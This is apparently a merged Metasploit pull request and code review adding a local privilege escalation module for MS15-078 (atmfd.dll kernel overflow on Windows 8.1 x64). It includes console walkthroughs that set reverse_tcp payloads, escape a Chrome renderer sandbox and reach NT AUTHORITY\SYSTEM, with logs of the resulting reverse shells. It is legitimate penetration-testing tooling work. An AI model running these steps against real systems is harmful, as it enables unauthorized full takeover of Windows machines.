### PR TITLE
Add module for MS15-078 (atmfd.dll buffer overflow) Local Privilege Escalation

### PR DESCRIPTION
**Pull request by jvazquez-r7**
This module adds support for MS15-078 (atmfd.dll buffer overflow) as exploited by Hacking Team and leaked earlier this year (https://github.com/vlad902/hacking-team-windows-kernel-lpe).
## Verification
- [x] Install a vulnerable Windows 8.1 64 bits machine. My testing environment is atmfd.dll 5.1.2.238, win32k.sys 6.3.9600.17393 and ntoskrnl.exe 6.3.9600.17415. The ROP chains use hardcoded offsets, so the DLL's versions are important, specially for win32k and ntoskrnl. If you test with other versions and it works or doesn't feel free to comment, I can update the check method :)
- [x] Get a meterpreter 64 bits on the target

```
msf exploit(handler) > run

[*] Started reverse handler on 172.16.158.1:4444
[*] Starting the payload handler...
[*] Sending stage (1105970 bytes) to 172.16.158.132
[*] Meterpreter session 3 opened (172.16.158.1:4444 -> 172.16.158.132:49243) at 2015-09-03 12:22:58 -0500

meterpreter > sysinfo
Computer        : WIN-USPGTFV120Q
OS              : Windows 8 (Build 9200).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/win64
meterpreter > background
[*] Backgrounding session 3...
```
- [x] Use the local exploit module with the new session

```
msf exploit(handler) > use exploit/windows/local/ms15_078_atmfd_bof
msf exploit(ms15_078_atmfd_bof) > set session 3
session => 3
```
- [ ] Do `check`. `Appears` means the same environment than the one used for exploit development was found. `Detected` means which the vulnerable component version is vulnerable but the environment doesn't match. Use at your own risk :) We are exploiting the kernel!

```
msf exploit(ms15_078_atmfd_bof) > check
[*]  - The target appears to be vulnerable.
```
- [x] Set the meterpreter 64 bits payload, lhost if necessary and exploit, hopefully you'll get a SYSTEM session!

```
msf exploit(ms15_078_atmfd_bof) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf exploit(ms15_078_atmfd_bof) > set lhost 172.16.158.1
lhost => 172.16.158.1
msf exploit(ms15_078_atmfd_bof) > rexploit
[*] Reloading module...

[*] Started reverse handler on 172.16.158.1:4444
[*] Launching notepad to host the exploit...
[+] Process 2972 launched.
[*] Reflectively injecting the exploit DLL into 2972...
[*] Exploit injected. Injecting payload into 2972...
[*] Payload injected. Executing exploit...
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Sending stage (1105970 bytes) to 172.16.158.132
[*] Meterpreter session 4 opened (172.16.158.1:4444 -> 172.16.158.132:49250) at 2015-09-03 12:24:10 -0500

meterpreter > sysinfo
Computer        : WIN-USPGTFV120Q
OS              : Windows 8.1 (Build 9600).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/win64
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 172.16.158.132 - Meterpreter session 4 closed.  Reason: User exit
```
## Use the Module to bypass Chrome Sandbox
- [ ] Get a a 64 bits meterpreter session on the target

```
msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/x64/meterpreter/reverse_tcp
^R
payload => windows/x64/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 172.16.158.1
lhost => 172.16.158.1
msf exploit(handler) > exploit

[*] Started reverse handler on 172.16.158.1:4444
[*] Starting the payload handler...
[*] Sending stage (1105970 bytes) to 172.16.158.135
[*] Meterpreter session 1 opened (172.16.158.1:4444 -> 172.16.158.135:49290) at 2015-09-03 13:06:29 -0500

meterpreter > getuid
meterpreter > getuid
Server username: WIN-USPGTFV120Q\juan
meterpreter > sysinfo
Computer        : WIN-USPGTFV120Q
OS              : Windows 8 (Build 9200).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/win64
```
- [ ] Migrate to a Low Integrity Chrome renderer (64 bits)

```
meterpreter > migrate 3744
[*] Migrating from 3268 to 3744...
[*] Migration completed successfully.
meterpreter > getpid
Current pid: 3744
meterpreter > ps -S 3744

Process List
============

 PID   PPID  Name              Arch  Session  User                  Path
 ---   ----  ----              ----  -------  ----                  ----
 3744  1660  chrome.exe        x64   1        WIN-USPGTFV120Q\juan  C:\Program Files (x86)\Google\Chrome\Application\chrome.exe

meterpreter > sysinfo
Computer        : WIN-USPGTFV120Q
OS              : Windows 8.1 (Build 9600).
Architecture    : x64
System Language : en_US
Meterpreter     : x64/win64
meterpreter > background
[*] Backgrounding session 1...
```
- [ ] Use the module on get a new SYSTEM session from the privilege elevated renderer

```
msf exploit(handler) > use exploit/windows/local/ms15_078_atmfd_bof
msf exploit(ms15_078_atmfd_bof) > set session 1
session => 1
msf exploit(ms15_078_atmfd_bof) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf exploit(ms15_078_atmfd_bof) > set lhost 172.16.158.1
lhost => 172.16.158.1
msf exploit(ms15_078_atmfd_bof) > rexploit
[*] Reloading module...

[*] Started reverse handler on 172.16.158.1:4444
[*] Launching notepad to host the exploit...
[*] Operation failed. Trying to elevate the current process...
[*] Reflectively injecting the exploit DLL into 3744...
[*] Exploit injected. Injecting payload into 3744...
[*] Payload injected. Executing exploit...
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Sending stage (1105970 bytes) to 172.16.158.135
[*] Meterpreter session 2 opened (172.16.158.1:4444 -> 172.16.158.135:49291) at 2015-09-03 13:08:01 -0500

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > getpid
Current pid: 3744
meterpreter > ps -S 3744

Process List
============

 PID   PPID  Name                    Arch  Session  User                          Path
 ---   ----  ----                    ----  -------  ----                          ----
 3744  1660  chrome.exe              x64   1        NT AUTHORITY\SYSTEM           C:\Program Files (x86)\Google\Chrome\Application\chrome.exe

meterpreter > exit
[*] Shutting down Meterpreter...

[*] 172.16.158.135 - Meterpreter session 2 closed.  Reason: User exit
```

### CODE REVIEW

**Comment by wchen-r7** [comment]
Hey @jvazquez-r7, not too long ago I added two new methods in Msf::Post::Common to give you the normalized version of the target architecture and OS name, because without normalization, sometimes you might get different strings for the same thing. Like for example, we've x86 being represented as x86, wow64, i[3456]86, etc. The normalized strings comes from ARCH_TYPES for arch, and OS name comes from Msf::Module::Platform.

To detect the arch, you can try:

```ruby
arch = get_target_arch
```

To detect the OS, you can try:

```ruby
os = get_target_os
```

The code can be found here:
https://github.com/rapid7/metasploit-framework/blob/master/lib/msf/core/post/common.rb

Would you mind using these methods in your module?

File: modules/exploits/windows/local/ms15_078_atmfd_bof.rb [hunk 1]
```diff
@@ -0,0 +1,178 @@
...
+    return nil if major.nil?
+    ver = "#{major}.#{minor}.#{build}.#{revision}"
+    vprint_status("ntoskrnl.exe file version: #{ver} branch: #{branch}")
+
+    ver
+  end
+
+  def check
+    # We have tested only windows 8.1
+    if sysinfo['OS'] !~ /Windows 8/i
```
Comment (jvazquez-r7) [inline modules/exploits/windows/local/ms15_078_atmfd_bof.rb]: get_windows_os returns just 'Windows' so I'm using sysinfo['OS']  here still

File: modules/exploits/windows/local/ms15_078_atmfd_bof.rb [hunk 2]
```diff
@@ -0,0 +1,178 @@
...
+      return Exploit::CheckCode::Unknown
+    end
+
+    # We have tested only 64 bits
+    if sysinfo['Architecture'] !~ /(wow|x)64/i
```
Comment (jvazquez-r7) [inline modules/exploits/windows/local/ms15_078_atmfd_bof.rb]: wow64 indicates the system is 64 bits, we just need a 64 bits meterpreter into a 64 bits process. But we can check the installation still.

**Comment by jvazquez-r7** [comment]
@wchen-r7 sure! Used get_target_arch when possible. Provided explanations where get_target_arch/get_target_os weren't good enough for the case, makes sense?

**Comment by wchen-r7** [comment]
yup

**Comment by wchen-r7** [comment]
@jvazquez-r7  Hmmm no luck here:


```
[*] Started reverse handler on 192.168.1.64:5555 
[*] atmfd.dll file version: 5.1.2.238 branch: 23
[*] win32k.sys file version: 6.3.9600.17915 branch: 17
[*] Launching notepad to host the exploit...
[+] Process 3256 launched.
[*] Reflectively injecting the exploit DLL into 3256...
[*] Exploit injected. Injecting payload into 3256...
[*] Payload injected. Executing exploit...
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
msf exploit(ms15_078_atmfd_bof) > 
```

**Comment by jvazquez-r7** [comment]
Your win32k.sys is 6.3.9600.17915. As I explain in the PR I had only win32k.sys 6.3.9600.17393 for developing and testing. 

And the chains are built with hardcoded offsets. So is definitely library dependent. If you share with me the win32k.sys and ntoskrnl.exe versions I can try to find them, install and build the ROP chains also for these versions. But will happen next week :-) 


I see the win32k.sys version on your output, but not the ntoskrnl.exe. Hopefully both versions will be newer than mine because upgrading is easier than downgrading =)

In the meanwhile, if you can get an environment with my same dll versions, I'd love to listen if it works for you. Finally, definitely I'll touch the exploit method to proceed only when the exact DLL versions are found.

Thanks for testing!

**Comment by wchen-r7** [comment]
Yeah my box automatically updated when I booted it up, and then I had to manually strip the updates. Maybe it makes more sense to only exploit when #check returns Exploit::CheckCode::Appears?

I can give you these files tomorrow.

**Comment by jvazquez-r7** [comment]
@wchen-r7 yeah definitely :) since I couldn't test I tried to be confident which maybe stars could align hehe But definitely not. I'll change it to exploit only when Appears. And will try to update to the same versions than you and add the offsets also for your versions :) When most versions covered, the best!

**Comment by wchen-r7** [comment]
I'm gonna apply the delayed label here while we improve this.

**Comment by jvazquez-r7** [comment]
@wchen-r7 do you mind to give another try? I've added a bunch of chains :) (2015 should be covered until the date of patching).

I've stopped adding rop chains once I reached the point were windows updates started to complain about downgrading my system :P

**Comment by wchen-r7** [comment]
ok yup

**Comment by wchen-r7** [comment]
Works for me now:

```
msf exploit(ms15_078_atmfd_bof) > run

[*] Started reverse handler on 192.168.1.64:5555 
[*] Checking target...
[*] Exploiting with win32k 6.3.9600.17915 and nt 6.3.9600.17936...
[*] Launching notepad to host the exploit...
[+] Process 5096 launched.
[*] Reflectively injecting the exploit DLL into 5096...
[*] Exploit injected. Injecting payload into 5096...
[*] Payload injected. Executing exploit...
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Sending stage (1105970 bytes) to 192.168.1.189
[*] Meterpreter session 4 opened (192.168.1.64:5555 -> 192.168.1.189:49634) at 2015-09-16 15:05:34 -0500

meterpreter >
```

**Pull request merged**